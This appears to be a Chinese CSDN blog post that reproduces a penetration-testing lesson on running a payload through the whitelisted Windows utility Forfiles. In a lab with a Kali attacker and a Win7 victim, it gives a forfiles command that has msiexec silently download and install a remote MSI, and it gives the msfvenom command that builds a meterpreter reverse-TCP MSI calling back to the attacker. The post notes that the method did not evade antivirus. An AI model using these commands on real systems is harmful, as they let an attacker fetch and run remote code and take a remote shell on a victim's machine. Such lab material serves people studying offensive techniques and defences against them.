对亮神基于白名单Forfiles 执行 payload 第十四季复现

最新推荐文章于 2021-06-21 14:24:15 发布
最新推荐文章于 2021-06-21 14:24:15 发布
阅读量291 收藏
点赞数
分类专栏: 亮神文章复现 文章标签: msf 白名单
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/89879973
版权

0x00 Forfiles简介:

Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用。

0x01 环境

攻击机 kali 192.168.5.100
靶机 win7 192.168.5.101
装有av

0x02复现

攻击机
在这里插入图片描述
靶机
在这里插入图片描述

forfiles /p c:\windows\system32 /m cmd.exe /c  "msiexec.exe /q /i http://192.168.5.100/shellcode.msi"

shell弹回
在这里插入图片描述

0x03 shellcode.msi

在这里插入图片描述

msfvenom -a  x86 --platform windows -p  windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f msi > shellcode.msi

启用80监听
在这里插入图片描述

0x04 总结

不过AV。

0x05 借鉴

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/84_基于白名单Forfiles执行payload第十四季.html

cxk331
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
60.远控免杀专题(60)-白名单Forfiles.exe执行payload1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
第六十六课:借助aspx对payload进行分离免杀1
08-03
靶机背景:msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler
第八十四课:基于白名单Forfiles执行payload第十四.docx
09-15
第八十四课:基于白名单Forfiles执行payload第十四.docx
渗透测试-基于白名单执行payload--Forfiles
weixin_30555125的博客
05-02 117
0x01 Forfiles简介: Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用。 微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=w...
对亮基于白名单 PsExec 执行 payload 第十三复现
cxk
05-06 337
0x00 PsExec 简介: 微软于2006年7月收购sysinternals公司,PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性 0x01 环境 攻击机 kali 192.168.5.100 靶机 win7 192.1...
护卫主机大师被提权漏洞利用(可千万不能乱装护卫主机管理一键安装的软件)
网站安全专家
06-16 1万+
 “护卫·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫14年安全防护经验,严格限制每个站点独立权限,彻底阻挡跨站入侵。”这话说的有点绝对性,做安全...
护卫6588端口提权
https://www.cnblogs.com/zpchcbd/
04-06 1559
利用条件: 1.有shell 2.有可执行脚本 <?php function httpGet() { $url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($c...
基于白名单Payload
CSDN
08-14 1万+
并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便。Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件,Mshta所在路径已被系统添加PATH环境变量中,因此,可直接执行Mshta.exe命令。将上方替换好的代码,重命名为 shell.hta 文件,然后放到apache根目录下,启动远程服务。
JS使用htef访问html文件,基于白名单Payload
weixin_39761573的博客
06-21 1091
利用 Msiexec 命令DLL反弹Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便。1.首先生成Payload...
Forfiles 命令说明&用法示例
热门推荐
木苒的博客
10-03 2万+
FORFILES forfiles是一款windows平台的软件工具,其中选择文件并运行一个命令来操作文件。文件选择标准包括名称和上次修改日期。命令说明符支持一些特殊的语法选项。它可以直接在命令行中使用,也可以在批处理文件或其他脚本中使用。 该forfiles命令最初作为加载项提供在Windows NT 资源工具包中。它成为Windows Vista的标准实用程序,作为新管理功能的一部分。 ...
forfiles 批处理删除文件
最新发布
03-20
forfiles 批处理删除文件
bat使用forfiles自动批量删除过期文件
09-21
主要介绍了bat使用forfiles自动批量删除过期文件,需要的朋友可以参考下
使用forfiles命令批量删除N天前文件
09-21
主要介绍了使用forfiles命令批量删除N天前文件,因为最近备份的文件都是保存一个月的就可以了,所以就需要删除30天以前的文件,服务器上软件不太信任,用bat挺方便的,需要的朋友可以参考下
对亮基于白名单Mshta.exe 执行 payload 第五复现
cxk
05-03 2256
0x00 Mshta简介 Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 装有国内常见AV 0x02复现 攻击机配置监听 靶机运行 shell弹回 0x03 test.h...
对亮基于白名单 Msbuild.exe 执行 payload 第一复现
cxk
05-01 708
0x00 MSBuild简介: MSBuild是 Microsoft Build Engine 的缩写,代表 Microsoft 和 Visual Studio 的新的生成平台。MSBuild 在如何处理和生成软件方面是完全透明的,使开发人员能够在未安装Visual Studio 的生成实验室环境中组织和生成产品。MSBuild 引入了一种新的基于 XML 的项目文件格式,这种格式容易理解、易于扩...
对亮基于白名单Installutil.exe 执行 payload 第二复现
cxk
05-02 618
0x00 Installer简介 Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 装有国内常见AV 0x02复现 攻击机配置监听 靶机运行 she...
对亮基于白名单Regsvr32 执行 payload 第九复现
cxk
05-03 564
0x00 Regsvr32简介: Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。WinXP及以上系统的regsvr32.exe在windows\system32文件夹下;2000系统的regsvr32.exe在winnt\system32文件夹下。但搭配regsvr32.exe使用的 DLL,需要提供 DllRegis...
对亮基于白名单 Csc.exe 执行 payload 第七复现
cxk
05-03 505
待补充
forfiles删除备份文件
11-12
- /c 参数后面跟随的命令表示对搜索到的文件执行的命令 - "cmd /c del @file"表示执行cmd命令并删除@file所指的文件 2. 输入以上命令后,按下回车键,系统会开始搜索并删除所有以.bak为后缀的备份文件。 这样就...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值